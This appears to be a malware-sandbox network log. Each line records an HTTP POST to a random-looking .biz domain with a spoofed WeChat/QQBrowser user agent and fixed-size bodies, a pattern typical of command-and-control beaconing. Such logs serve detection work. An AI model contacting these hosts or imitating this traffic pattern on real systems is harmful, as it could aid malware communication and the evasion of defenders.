                Source: global trafficHTTP traffic detected: POST /udqtfnpdyqh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /kacads HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /nuyubw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /rn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /enxhgeexxmda HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /pry HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xrcr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /nr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /uku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /sbnab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /dvarulpg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /tfbvwglkixk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /noubyejh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /cdrlubbsf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /qmfujjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /dxlhs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /rgkgvuyxljjatio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ki HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /bq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vhecjxbkixjuljyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /cgkctkdxtvumt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /nmqrslobvguxfrkm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /esgffqvf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /eviqjrwjsc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /xyrpanl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /aoayitmlcu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ceercoregt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xgyulldvremqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /jhppqdqsxkpre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xsnbcmvbhjayqro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /myrpsocdgnp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /pm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /jntykoegrmymca HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /nwuwfpndyaon HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /tpnlrogxe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /gqjcfeax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /fxyeanegauuypg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /itmauuakdv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /cqrtypmijgihv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /xcccv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /seopbnrlp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /vuf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /lqskha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /poufjqlcmnc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /fwiohktfcqxxnbh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /fvf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /pdgkdbbj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /byhbnbikqcomemw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /jubq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xcnnbrtqgt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /qoerrcmhybkh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /fu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /wnele HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /lrxwrhp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /xwfedwcvhvxkiha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /mfixqgnsqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /fwv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /frqpsrt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /hljxfepxgpjush HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /fiarjsoopiyhm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /vwjckymhn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /hij HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /dpjyudy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
